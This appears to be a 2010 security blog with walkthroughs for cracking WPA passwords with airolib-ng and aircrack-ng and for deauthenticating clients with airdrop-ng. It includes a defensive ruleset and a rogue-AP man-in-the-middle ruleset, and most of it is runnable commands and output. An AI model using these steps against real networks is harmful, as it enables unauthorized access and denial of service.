Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I use to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSID’s and Passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and Password list in each database.  If you are in an area with multiple SSID’s running WPA you can note all of the SSID’s in a list and import them into the database.  This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4way Authentication Handshakes with the same database file.  Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.   
Note:  I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel.  I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...

Setting up the databases:
First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.

Airolib-ng    --import essid 

Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...
Done.

Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.

Airolib-ng   --import  

Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.

Clean Database:
Example:
root@ ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.

Create your PMK’s:
After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.

root@ ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Cracking:
Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.

Example:
root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
   #  BSSID                               ESSID                     Encryption
   1  00:18:F8:66:7E:CC        ficti0nAP               WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...

Optional:
Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.



Monday, February 15, 2010

Airdrop-ng Basics on BT4 Final


De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG, it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related and it seemed to be more consistently working after installing psyco. Below are my notes on using Airdrop-ng and also the information from schmoocon 2010. This tool should to be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.

Description:

Airdrop-NG is a wireless de-authentication tool released at schmoocon 2010 which can also double as a poor man's WIPS depending on your intentions.  Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using Client Stations MAC's, BSSID's and a few other descriptors. Rules can be updated while the program is running in a loop making for easy on the fly changes within your attack. On each loop Airdrop-NG reparse’s the rules file and continues sending packets based on a CSV output from Airodump-ng.

Below will be a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against his BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python install.py

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed!  =)
Would you like to install lorcon? (y/n): y
Running svn co http://802.11ninja.net/svn/lorcon/branch/lorcon-old. This may tak
e a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/Makefile.in
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c

..........................
.................................................
copying build/lib.linux-i686-2.5/pylorcon.so -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)


Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  python-psyco
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 http://archive.offensive-security.com pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...



Setup Wireless Interface:

root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)


Switch to another shell and run airodump:
(leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH  6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:5B:6B:4E:6C:6F   -1       26        1    0  11  54 . WEP  WEP         Testing
 02:1F:28:65:AE:ED  -24      489      391    0   1  54e  WPA2 CCMP   PSK  ficti0nsAP
 00:0B:85:6C:2D:4F  -71       48        0    0   1  54 . WEP  WEP         Linksys
 00:1B:85:6E:2D:4D  -72       48        0    0   1  54 . WEP  WEP
 06:0B:85:6C:7D:4E  -71       45        0    0   1  54 . OPN   

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   02:16:08:AD:6E:95  -67    0 - 1      0        3
 (not associated)   00:A0:F8:B8:DF:69  -73    0 - 1    120       39  Linksys
 (not associated)   00:24:36:74:F1:97  -53    0 - 1      0       57
 02:0B:65:4E:6C:62  02:17:6B:20:00:ED  -72    0 - 1    124       27
 02:1F:28:65:AE:ED  00:23:4E:DF:AE:70    0   54e- 1e   979      444
 02:1F:28:65:AE:ED  00:21:00:DB:60:00  -28    0 - 1     67       91  ficti0nsAP
 02:1F:28:65:AE:ED  00:21:6A:11:0E:52  -38    1e- 2e     0      212  ficti0nsAP
 02:1F:28:65:AE:ED  00:2E:45:9F:87:AC  -38    1e- 6e     0      194  ficti0nsAP
 02:1F:28:65:AE:ED  00:23:3E:DF:ED:ED  -42   54e- 1      0       63  ficti0nsAP
 02:1F:28:65:AE:ED  00:25:08:AD:50:7C  -51   54e-24      0        2
 02:1F:28:65:AE:ED  00:1E:C2:C4:E5:79  -67    1e- 1      0       94  ficti0nsAP



Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients,  I will explain a bit about the rules form the schmooo presentation then we will add a rule to our rules.conf.

Rules are broken down into 3 fields: (Action/ap|clients):


2 options for state field:

-Allow
-Deny

5 options for AP field:
-ESSID
-BSSID
-Company OUI name value
-Company OUI numeric value
-any

5 options for clients field
-mac
-multiple macs  (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value
-any

Add your rule Example:
 Below is a rule that denys all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID

Example Deny Rule:
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50

Rule explanation:
d = deny
/      <-- get this AP address from the airodump output
|       <-- in this case a clients address


Run airdrop with new rule:
(Leave airodump running during this!!)
Now run Airodrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process.  This will hopefully keep your victim from having network access.

root@ficti0n:~/# python airdrop-ng.py -b -i mon0 -t /root/Test-01.csv  -r docs/dropRules.conf
#################################################
#             Welcome to AirDrop-ng             #
#################################################

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
d/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

.....................
...............................

Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode


Poor Man’s WIPS:

Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MAC's:

11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Create the list of  your AP BSSID's:
AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

Rules:
Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00
a/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow 3 clients to talk to EA:CF:DF:AD:00:00
a/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny those 3 clients to any other access points
d/any|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66



MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn’t shown during the demo because the presenters couldn’t get their monitors working correctly.. But I imagine the ruleset would be to deny all clients’ access to the legitimate BSSID's within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules which I am guessing would go something similar to the following, but I could be way off, this however should function similarly to what I think they were going to show us.

Make a list of local BSSID's:

AB:AD:F2:14:00:00
EA:CF:DF:AD:00:00

FON MAC:
AB:CD:EF:12:34:56


Add In some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00
d/AB:AD:F2:14:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Deny 3 clients to talk to EA:CF:DF:AD:00:00
d/EA:CF:DF:AD:00:00|11:22:33:44:55:66,21:2F:33:44:55:66,11:22:33:44:55:66

Allow Access to my evil AP's:
a/AB:CD:EF:12:34:56|any



I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...
--Ficti0n

Learning Binary Ninja For Reverse Engineering and Scripting

 Recently added a new playlist with about 1.5 hours of Binary Ninja Content so far..    Video 1: I put this out a couple months ago covering...